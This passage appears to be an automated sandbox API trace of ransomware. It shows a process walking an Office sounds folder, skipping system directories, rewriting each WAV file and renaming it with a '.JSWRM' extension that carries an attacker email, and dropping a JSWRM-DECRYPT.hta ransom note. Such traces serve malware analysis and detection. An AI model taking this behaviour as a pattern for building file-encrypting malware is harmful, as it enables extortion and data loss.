(lpString1="RADAR.WAV", lpString2="system volume information") returned -1 [0130.849] lstrcmpiW (lpString1="RADAR.WAV", lpString2="msocache") returned 1 [0130.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RADAR.WAV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RADAR.WAV", cchWideChar=9, lpMultiByteStr=0x345e508, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RADAR.WAV", lpUsedDefaultChar=0x0) returned 9 [0130.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RADAR.WAV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RADAR.WAV", cchWideChar=9, lpMultiByteStr=0x345e4d8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RADAR.WAV", lpUsedDefaultChar=0x0) returned 9 [0130.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\RADAR.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\radar.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.850] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=65770) returned 1 [0130.850] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.850] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x100e0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x100e0, lpOverlapped=0x0) returned 1 [0130.855] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.855] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x100e0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x100e0, lpOverlapped=0x0) returned 1 [0130.855] CloseHandle (hObject=0x338) returned 1 [0130.855] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\RADAR.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\radar.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\RADAR.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\radar.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.860] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18afa0b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18afa0b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18afa0b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd64a, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="TOOT.WAV", cAlternateFileName="")) returned 1 [0130.860] lstrcmpiW (lpString1="TOOT.WAV", lpString2=".") returned 1 [0130.860] lstrcmpiW (lpString1="TOOT.WAV", lpString2="..") returned 1 [0130.860] lstrcmpiW (lpString1="TOOT.WAV", lpString2="...") returned 1 [0130.860] lstrcmpiW (lpString1="TOOT.WAV", lpString2="windows") returned -1 [0130.860] lstrcmpiW (lpString1="TOOT.WAV", lpString2="recovery") returned 1 [0130.860] lstrcmpiW (lpString1="TOOT.WAV", lpString2="perflogs") returned 1 [0130.861] lstrcmpiW (lpString1="TOOT.WAV", lpString2="documents and settings") returned 1 [0130.861] lstrcmpiW (lpString1="TOOT.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.861] lstrcmpiW (lpString1="TOOT.WAV", lpString2="system volume information") returned 1 [0130.861] lstrcmpiW (lpString1="TOOT.WAV", lpString2="msocache") returned 1 [0130.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TOOT.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TOOT.WAV", cchWideChar=8, lpMultiByteStr=0x345e508, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TOOT.WAV", lpUsedDefaultChar=0x0) returned 8 [0130.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TOOT.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TOOT.WAV", cchWideChar=8, lpMultiByteStr=0x345e4d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TOOT.WAV", lpUsedDefaultChar=0x0) returned 8 [0130.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\TOOT.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\toot.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.862] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=54858) returned 1 [0130.862] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.862] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0xd640, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0xd640, lpOverlapped=0x0) returned 1 [0130.866] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.866] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xd640, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0xd640, lpOverlapped=0x0) returned 1 [0130.867] CloseHandle (hObject=0x338) returned 1 [0130.867] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\TOOT.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\toot.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\TOOT.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\toot.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.868] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18afa0b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18afa0b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18afa0b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xea72, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="VIBE.WAV", cAlternateFileName="")) returned 1 [0130.868] lstrcmpiW (lpString1="VIBE.WAV", lpString2=".") returned 1 [0130.868] lstrcmpiW (lpString1="VIBE.WAV", lpString2="..") returned 1 [0130.868] lstrcmpiW (lpString1="VIBE.WAV", lpString2="...") returned 1 [0130.868] lstrcmpiW (lpString1="VIBE.WAV", lpString2="windows") returned -1 [0130.868] lstrcmpiW (lpString1="VIBE.WAV", lpString2="recovery") returned 1 [0130.868] lstrcmpiW (lpString1="VIBE.WAV", lpString2="perflogs") returned 1 [0130.868] lstrcmpiW (lpString1="VIBE.WAV", lpString2="documents and settings") returned 1 [0130.868] lstrcmpiW (lpString1="VIBE.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.868] lstrcmpiW (lpString1="VIBE.WAV", lpString2="system volume information") returned 1 [0130.868] lstrcmpiW (lpString1="VIBE.WAV", lpString2="msocache") returned 1 [0130.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VIBE.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VIBE.WAV", cchWideChar=8, lpMultiByteStr=0x345e508, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VIBE.WAV", lpUsedDefaultChar=0x0) returned 8 [0130.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VIBE.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VIBE.WAV", cchWideChar=8, lpMultiByteStr=0x345e4d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VIBE.WAV", lpUsedDefaultChar=0x0) returned 8 [0130.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\VIBE.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\vibe.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.869] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=60018) returned 1 [0130.869] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.869] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0xea70, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0xea70, lpOverlapped=0x0) returned 1 [0130.874] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.874] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xea70, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0xea70, lpOverlapped=0x0) returned 1 [0130.874] CloseHandle (hObject=0x338) returned 1 [0130.874] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\VIBE.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\vibe.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\VIBE.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\vibe.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.875] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18b6c7ce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18b6c7ce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1907d846, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xae8a, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="WARN.WAV", cAlternateFileName="")) returned 1 [0130.875] lstrcmpiW (lpString1="WARN.WAV", lpString2=".") returned 1 [0130.875] lstrcmpiW (lpString1="WARN.WAV", lpString2="..") returned 1 [0130.875] lstrcmpiW (lpString1="WARN.WAV", lpString2="...") returned 1 [0130.875] lstrcmpiW (lpString1="WARN.WAV", lpString2="windows") returned -1 [0130.875] lstrcmpiW (lpString1="WARN.WAV", lpString2="recovery") returned 1 [0130.875] lstrcmpiW (lpString1="WARN.WAV", lpString2="perflogs") returned 1 [0130.876] lstrcmpiW (lpString1="WARN.WAV", lpString2="documents and settings") returned 1 [0130.876] lstrcmpiW (lpString1="WARN.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.876] lstrcmpiW (lpString1="WARN.WAV", lpString2="system volume information") returned 1 [0130.876] lstrcmpiW (lpString1="WARN.WAV", lpString2="msocache") returned 1 [0130.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WARN.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WARN.WAV", cchWideChar=8, lpMultiByteStr=0x345e508, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WARN.WAV", lpUsedDefaultChar=0x0) returned 8 [0130.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WARN.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WARN.WAV", cchWideChar=8, lpMultiByteStr=0x345e4d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WARN.WAV", lpUsedDefaultChar=0x0) returned 8 [0130.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\WARN.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\warn.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.877] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=44682) returned 1 [0130.877] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.877] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0xae80, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0xae80, lpOverlapped=0x0) returned 1 [0130.881] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.881] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xae80, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0xae80, lpOverlapped=0x0) returned 1 [0130.881] CloseHandle (hObject=0x338) returned 1 [0130.881] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\WARN.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\warn.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Places\\WARN.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\places\\warn.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.883] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18b6c7ce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18b6c7ce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1907d846, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xae8a, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="WARN.WAV", cAlternateFileName="")) returned 0 [0130.883] FindClose (in: hFindFile=0x231ec0 | out: hFindFile=0x231ec0) returned 1 [0130.883] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1bc991c1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1bc991c1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="Things", cAlternateFileName="")) returned 1 [0130.883] lstrcmpiW (lpString1="Things", lpString2=".") returned 1 [0130.883] lstrcmpiW (lpString1="Things", lpString2="..") returned 1 [0130.883] lstrcmpiW (lpString1="Things", lpString2="...") returned 1 [0130.883] lstrcmpiW (lpString1="Things", lpString2="windows") returned -1 [0130.883] lstrcmpiW (lpString1="Things", lpString2="recovery") returned 1 [0130.883] lstrcmpiW (lpString1="Things", lpString2="perflogs") returned 1 [0130.883] lstrcmpiW (lpString1="Things", lpString2="documents and settings") returned 1 [0130.883] lstrcmpiW (lpString1="Things", lpString2="$RECYCLE.BIN") returned 1 [0130.883] lstrcmpiW (lpString1="Things", lpString2="system volume information") returned 1 [0130.883] lstrcmpiW (lpString1="Things", lpString2="msocache") returned 1 [0130.883] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\jswrm-decrypt.hta")) returned 0xffffffff [0130.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.887] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.887] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0130.888] CloseHandle (hObject=0x314) returned 1 [0130.888] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\jswrm-decrypt.hta")) returned 0x20 [0130.888] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1bc991c1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44ac72c6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x210734, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0130.888] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0130.888] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1bc991c1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44ac72c6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="..", cAlternateFileName="")) returned 1 [0130.888] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0130.888] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0130.888] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18afa0b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc8fc, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="CAN.WAV", cAlternateFileName="")) returned 1 [0130.888] lstrcmpiW (lpString1="CAN.WAV", lpString2=".") returned 1 [0130.888] lstrcmpiW (lpString1="CAN.WAV", lpString2="..") returned 1 [0130.888] lstrcmpiW (lpString1="CAN.WAV", lpString2="...") returned 1 [0130.888] lstrcmpiW (lpString1="CAN.WAV", lpString2="windows") returned -1 [0130.888] lstrcmpiW (lpString1="CAN.WAV", lpString2="recovery") returned -1 [0130.888] lstrcmpiW (lpString1="CAN.WAV", lpString2="perflogs") returned -1 [0130.888] lstrcmpiW (lpString1="CAN.WAV", lpString2="documents and settings") returned -1 [0130.888] lstrcmpiW (lpString1="CAN.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.888] lstrcmpiW (lpString1="CAN.WAV", lpString2="system volume information") returned -1 [0130.888] lstrcmpiW (lpString1="CAN.WAV", lpString2="msocache") returned -1 [0130.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAN.WAV", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0130.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAN.WAV", cchWideChar=7, lpMultiByteStr=0x345e508, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CAN.WAV", lpUsedDefaultChar=0x0) returned 7 [0130.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAN.WAV", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0130.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAN.WAV", cchWideChar=7, lpMultiByteStr=0x345e4d8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CAN.WAV", lpUsedDefaultChar=0x0) returned 7 [0130.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, 